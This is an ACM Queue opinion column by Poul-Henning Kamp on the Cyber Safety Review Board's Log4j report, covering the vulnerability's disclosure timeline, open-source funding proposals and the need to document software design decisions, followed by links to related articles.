The Bike Shed

  Download PDF version of this article PDF

CSRB's Opus One

Comments on the Cyber Safety Review Board Log4j Event Report

Poul-Henning Kamp

The recently formed CSRB (Cyber Safety Review Board), established by President Biden in May 2021 to review significant cyber incidents and provide "advice, information, or recommendations for improving cybersecurity and incident response practices and policy," published its first report in July: Review of the December 2021 Log4j Event (

The Log4j logging utility has been integrated into millions of Apache systems. "A vulnerability in such a pervasive and ubiquitous piece of software has the ability to impact companies and organizations (including governments) all over the world," according to the CSRB report.

To the best of my knowledge, this new CSRB report is the world's first from a dedicated IT security accident review board, and that deserves our full attention.

Before we start, let's get one thing perfectly clear: The entire and only reason for writing reports like this one is to avoid repeating the same mistake—no more, no less. Assigning guilt, placing blame, exposing incompetence, or getting people fired is not CSRB's job. It investigates; the rest of us act.

Writing, and to lesser extent reading, accident investigation reports is an art form of its own, so I will let you in on a secret: The big stinker in this one is at the top of page 15.

The Alibaba Cloud Security Team told the Apache Software Foundation about the Log4j vulnerability on November 24, and only on December 13, a full three weeks later, did they tell the Chinese Ministry of Industry and Information Technology about it.

The law of the land, in this case China, mandates that they report to the ministry within two days of discovery and not tell anybody else until and unless the ministry permits it. The ministry could have decided to keep a zero-day vulnerability like Log4j secret, in which case the rest of the world would still not have heard anything about it and Chinese spies would have had their own backdoor into all the vulnerable Log4j instances in the world.

A good political reaction would be for the United States and European Union to designate risking life, limb, or liberty to disclose a zero-day vulnerability of this caliber an explicit cause for political asylum.

With that out of the way...

I don't know enough about the internal workings of the U.S. government to pass judgment on many of the recommendations, and several others are so obvious that there is nothing to add. Except that now they have become official recommendations, which means that ignoring them could be a career-limiting move.

There is one recommendation specifically about FOSS (free and open-source software) on which I want to comment: Recommendation 13 says, "Increase investments in open source software security" and the first bullet is:

• OMB [Office of Management and Budget] should take appropriate steps to direct federal agency IT staff to contribute to the security and maintenance of open source software upon which they rely, as part of their regular duties.

Yes, please! But don't just make this about the federal government. Any organization that uses FOSS is, ipso-facto, joining a nonprofit co-op responsible for the future of that software. Most FOSS projects are developer-centric, and the world would be a much better place if they got more involvement from their actual users in terms of design decisions and testing and simply by improving and updating the documentation with actual user experience.

The second bullet is:

• ONCD [Office of the National Cyber Director], in coordination with OMB, should consider effective funding mechanisms to invest in widely used open source software tools, and to catalyze improvements in the overall security of the open source software ecosystem.

That can and will get sticky fast, as anything does when money gets involved. The best way to get a lot of bang for some bucks—with very little friction—is to look to the MacArthur Fellowships (commonly known as the "genius grants") for inspiration. Once per month, pick one promising young FOSS individual who shows a lot of promise and offer that person a grant of $10,000 per month for the next five years with no strings attached.

Yes, some of them will fizzle, some of them will party, but most of them will do something worthwhile and valuable to improve FOSS security, and a few of them will do something utterly brilliant, most of which would not happen or get the same traction if they had to make the market pay. It would cost $7.2 million per year, and it would be completely fair for U.S. taxpayers to pay for only the odd-numbered months and ask EU taxpayers to pay for the even-numbered ones. Please name it the "Margaret Hamilton Fellowship," which would be an appropriate and well-deserved honor for this pioneering computer scientist.

Finally, there is one aspect of FOSS that CSRB does not address, which deserves a hard look: design decisions.

The thing is, unlike, for example, the Heartbleed bug, Log4j was not a mistake. Log4j was an explicitly and deliberately added feature that worked precisely the way it was intended to work. Appendix C goes so far as to list some research and publications after the 2014 release of this Log4j feature—research that raised some relevant and concerning questions and there, appendix C just ends?

CSRB does not get into the actual design decision or the need for, or lack of, reconsideration of it, in light of the red flags that came later. Getting it right(er) from the start would, of course, have been nice, but I can testify from personal experience that FOSS developers usually have little or no clue where their code will end up or what it will be used for.

Back in 1994, I wrote a stopgap password scrambler for FreeBSD, which trivially and repeatedly applied the MD5 cryptographic hash algorithm to the password and salt in a hardware-unfriendly way. (It was a "stopgap" because export regulations prevented us from distributing the nearly DES (Data Encryption Standard) source code to a "real" Unix crypt(3) function.) I did not in any way, shape, or form foresee that in two short years my hastily cobbled-together source code would protect half of the passwords on a vastly larger Internet, including all the administrative passwords on all the routers from Cisco.

Equally little did I expect, a decade later, that my Varnish HTTP Cache would come to move a quarter of all web traffic in the world. Or that other bits and pieces of my code would end up in game consoles, cars, dishwashers, satellites, submarines, agricultural subsidy web applications, and who knows where else? Having talked with other authors of successful FOSS, I am comforted to know that I am not alone in this lack of foresight—but that only makes the problem worse.

Expecting FOSS authors to make good, long-term, correct design decisions without knowing the users—without even knowing the order of magnitude of users, and having little or no idea what they will use the software for—not only would be patently unreasonable but also dangerously stupid and stupidly dangerous. We don't lack good, true, and battle-tested general software design principles. Idols such as Frederick P. Brooks and Jim Gettys have produced some good rules we should all heed, but as far as I can tell, none of them contraindicated the addition of this feature to Log4j back in July 2013.

If the addition of the problematic feature was not a wrong design decision, people must subsequently have been uninformed about, overlooked, or not understood the full consequences of that design decision.

That is something we can and should work on.

Somewhere—very prominently—the Log4j documentation should have included a warning against log records containing unwashed input from potentially hostile sources, which, as far as I can tell, it did not. Not even after subsequent research, as listed in appendix C, raised warning flags.

We in FOSS need to become much better at documenting design decisions—along with their assumptions and consequences—in a way and a place where the right people (who?) will find it, read it, and understand it, before they do something ill-advised or downright stupid with our code.

And we need periodically to revise that documentation to make sure that the decisions made by "some random person in Nebraska" in the software's infancy are still the right ones, and that people understand their consequences in a changed world.

So, one way or another, "It seemed like a good design decision at the time" will always be a significant and unavoidable risk factor for FOSS security, and, therefore, CSRB will get to it, sooner or later, in one of its undoubtedly numerous future reports.


Poul-Henning Kamp ([email protected]) spent more than a decade as one of the primary developers of the FreeBSD operating system before creating Varnish HTTP Cache software, which around a fifth of all web traffic goes through at some point. He lives in his native Denmark, where he makes a living as an independent contractor, specializing in making computers do weird stuff. One of his most recent projects was a supercomputer cluster to stop the stars twinkling in the mirrors of ESO's (European Southern Observatory's) new ELT (extremely large telescope).

Copyright © 2022 held by owner/author. Publication rights licensed to ACM.


Originally published in Queue vol. 20, no. 4
see this item in the ACM Digital Library



Raphael Auer, Rainer Böhme, Jeremy Clark, Didem Demirag - Mapping the Privacy Landscape for Central Bank Digital Currencies
As central banks all over the world move to digitize cash, the issue of privacy needs to move to the forefront. The path taken may depend on the needs of each stakeholder group: privacy-conscious users, data holders, and law enforcement.

Sutapa Mondal, Mangesh S. Gharote, Sachin P. Lodha - Privacy of Personal Information
Each online interaction with an external service creates data about the user that is digitally recorded and stored. These external services may be credit card transactions, medical consultations, census data collection, voter registration, etc. Although the data is ostensibly collected to provide citizens with better services, the privacy of the individual is inevitably put at risk. With the growing reach of the Internet and the volume of data being generated, data protection and, specifically, preserving the privacy of individuals, have become particularly important.

Kallista Bonawitz, Peter Kairouz, Brendan McMahan, Daniel Ramage - Federated Learning and Privacy
Centralized data collection can expose individuals to privacy risks and organizations to legal risks if data is not properly managed. Federated learning is a machine learning setting where multiple entities collaborate in solving a machine learning problem, under the coordination of a central server or service provider. Each client's raw data is stored locally and not exchanged or transferred; instead, focused updates intended for immediate aggregation are used to achieve the learning objective.

Mark Russinovich, Manuel Costa, Cédric Fournet, David Chisnall, Antoine Delignat-Lavaud, Sylvan Clebsch, Kapil Vaswani, Vikas Bhatia - Toward Confidential Cloud Computing
Although largely driven by economies of scale, the development of the modern cloud also enables increased security. Large data centers provide aggregate availability, reliability, and security assurances. The operational cost of ensuring that operating systems, databases, and other services have secure configurations can be amortized among all tenants, allowing the cloud provider to employ experts who are responsible for security; this is often unfeasible for smaller businesses, where the role of systems administrator is often conflated with many others.

© ACM, Inc. All Rights Reserved.